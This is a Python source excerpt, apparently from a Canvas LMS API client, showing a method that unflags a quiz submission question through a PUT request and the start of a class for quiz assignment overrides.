def unflag(self, validation_token=None, **kwargs):
try:
kwargs["validation_token"] = validation_token or self.validation_token
except AttributeError:
raise RequiredFieldMissing(
"`validation_token` not set on this QuizSubmissionQuestion, must be passed"
" as a function argument."
)
kwargs["attempt"] = self.attempt
response = self._requester.request(
"PUT",
"quiz_submissions/{}/questions/{}/unflag".format(
self.quiz_submission_id, self.id
),
_kwargs=combine_kwargs(**kwargs),
)
question = response.json()["quiz_submission_questions"][0]
question.update(
{
"validation_token": kwargs["validation_token"],
"quiz_submission_id": self.quiz_submission_id,
}
)
super(QuizSubmissionQuestion, self).set_attributes(question)
return True
@python_2_unicode_compatible
class QuizAssignmentOverrideSet(CanvasObject):
def __str__(self):
return "Overrides for quiz_id {}".format(self.quiz_id)
| true | true |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.